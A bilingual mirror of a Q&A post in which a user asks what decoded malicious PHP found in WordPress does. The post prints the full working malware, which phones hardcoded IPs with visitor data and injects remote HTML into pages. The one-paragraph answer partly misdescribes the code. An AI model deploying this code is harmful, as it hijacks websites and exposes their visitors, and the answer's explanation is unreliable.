在 WordPress 安装中发现的这个恶意 PHP 代码有什么作用? [英] What does this malicious PHP code found in a WordPress install do?

问题描述

我能够解码我在一些 WordPress 文件中找到的以下 PHP 脚本.只是出于好奇，有人能告诉我这段代码实际上做了什么吗?看起来它已以某种方式复制到同一服务器上的其他 WordPress 安装.

I was able to decode the following PHP script which I found within some WordPress files. Just out of curiosity, can someone tell me what this code actually does? It looks like it has been somehow replicated to other WordPress installs on the same server.

<?php 

error_reporting(0);

if (!function_exists("ZM5j2q0shf_pirogok")){
function ZM5j2q0shf_pirogok(){
return false;
}

if (!function_exists("Uno_decode")){
function Uno_decode($String)
{
    $String = base64_decode($String);
    $Salt="dc5p9dOpBc";
    $StrLen = strlen($String);
    $Seq = "DMEf5HZuPq";
    $Gamma = "";
    while (strlen($Gamma)<$StrLen)
    {
        $Seq = pack("H*",sha1($Gamma.$Seq.$Salt));
        $Gamma.=substr($Seq,0,8);
    }

    return $String^$Gamma;
}
}

if (!function_exists("get_t_dir_mass")){
function get_t_dir_mass() {

if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { $res[] = realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { $res[] = realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { $res[] = realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { $res[] = realpath(dirname(__FILE__)); }

    return array_unique($res);
}
}

if (!function_exists("get_ua")){
function get_ua(){
$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".") === false){
$tmp = explode("|",$tt);
foreach($tmp as $u){
$know[] = trim($u);
}
}
}
}
}
if(count($know) == 0){
$know[] = "msie";
$know[] = "firefox";
$know[] = "googlebot";
}
return array_unique($know);
}
}

if (!function_exists("get_true_name")){
function get_true_name(){
return ".backup_time";
}
}

if (!function_exists("strposa")){
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) return true;
    }
    return false;
}
}

if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

$true_ua = get_ua();

if (strposa($ua,$true_ua)){

if (!function_exists("t_dir")){
function t_dir() {
if (function_exists("sys_get_temp_dir")) {
    if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
}
    if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { return realpath($_ENV["TMP"]); }
    if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { return realpath( $_ENV["TMPDIR"]); }
    if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { return realpath( $_ENV["TEMP"]); }
    $tempfile=@tempnam(__FILE__,"");
    if (@file_exists($tempfile)) {
      @unlink($tempfile);
    if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }

    }
    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
    if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
    if (@is_writeable(realpath(dirname(__FILE__)))) { return realpath(dirname(__FILE__)); }
    return null;
}
}

if (!function_exists("get_know_ip")){
function get_know_ip(){
$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";

$name = get_true_name();

foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".")>0){
$know[] = trim($tt);
}
}
}
}
return array_unique($know);
}
}

if (!function_exists("save_know_ip")){
function save_know_ip($ip){
$name = get_true_name();
$content =  implode(PHP_EOL, $ip);
foreach(get_t_dir_mass() as $t){
$f = fopen($t.DIRECTORY_SEPARATOR.$name,"w");
fputs($f,$content);
fclose($f);
}
}
}

if (!function_exists("ZM5j2q0shf_get_real_ip")){
function ZM5j2q0shf_get_real_ip() {
$proxy_headers = array("CLIENT_IP","FORWARDED","FORWARDED_FOR","FORWARDED_FOR_IP","HTTP_CLIENT_IP","HTTP_FORWARDED","HTTP_FORWARDED_FOR","HTTP_FORWARDED_FOR_IP", "HTTP_PC_REMOTE_ADDR","HTTP_PROXY_CONNECTION","HTTP_VIA", "HTTP_X_FORWARDED", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_FOR_IP","HTTP_X_IMFORWARDS","HTTP_XROXY_CONNECTION","VIA", "X_FORWARDED", "X_FORWARDED_FOR");
foreach($proxy_headers as $proxy_header)
{
if(isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])){return $_SERVER[$proxy_header];}
else if(stristr(",", $_SERVER[$proxy_header]) !== FALSE)
{$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header]))); 
if(($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp); 
if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
}

if (!function_exists("ZM5j2q0shf_get_url")){
function ZM5j2q0shf_get_url(){ 
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url,"?") !== false){
$url = substr($url,0,strpos($url,"?"));
}
return $url;
}
}


if (!function_exists("ZM5j2q0shf_get_contents")){
function ZM5j2q0shf_get_contents($ip, $page){
if((function_exists("curl_init")) && (function_exists("curl_exec"))){
    $ch = curl_init("http://" .$ip . "/" .$page);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    $ult = trim(curl_exec($ch));
    return $ult;
    }

if (ini_get("allow_url_fopen")) {
    $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
    return $ult;
    }
    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
    if ($fp) {$out = "GET $page HTTP/1.0\r\n";
    $out .= "Host: $ip\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $ret = "";
    while (!feof($fp)) {$ret  .=  fgets($fp, 128);}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}
return $ult;
}
}

if (!function_exists("ZM5j2q0shf_samui_get_links")){
function ZM5j2q0shf_samui_get_links(){

$all = get_know_ip();
shuffle($all);
$url = ZM5j2q0shf_get_url();
$real_ip = ZM5j2q0shf_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url.time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$ref = urlencode(strtolower($_SERVER["HTTP_REFERER"]));
$page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;

foreach ($all as $ip){
$tc = ZM5j2q0shf_get_contents(trim($ip),$page);
$pos = strpos($tc, $check);
if ($pos !== false){
$proxy_list = substr($tc,0,$pos);

save_know_ip(explode("\n",$proxy_list));


$links = substr($tc,$pos+32);
return $links;
}
}
}
}

if (!function_exists("ZM5j2q0shf_mod_con")){
function ZM5j2q0shf_mod_con($con){
if (strpos($con,"<body") !== false) {
$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".ZM5j2q0shf_samui_get_links(), $con,1);  
return $text;
} else {return $con;}
}
}


if (!function_exists("ZM5j2q0shf_callback")){
function ZM5j2q0shf_callback($buf){
if (headers_sent()){
if (in_array("Content-Encoding: gzip", headers_list())){
$tmpfname = tempnam(t_dir(), "FOO");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = ZM5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = ZM5j2q0shf_mod_con($buf); }} else {$contents = ZM5j2q0shf_mod_con($buf);}return($contents);
}
}

ob_start("ZM5j2q0shf_callback");

}
}
}

?>

推荐答案

它会通过已知的父 IP 下载压缩的有效负载并将其存储到您的临时目录之一.然后根据有效负载将 html 注入到您的 html 页面顶部，就在 下方.它还检查可用于下载更多要注入的坏人代码的新 IP.

Its going to a known parent ip's to download a zipped payload and store it to one of your temp directories. Its then injecting html depending on payload into the top of your html page just bellow <body>. It also checks for new ip's that can be used to download more bad guy code to inject.

这篇关于在 WordPress 安装中发现的这个恶意 PHP 代码有什么作用?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！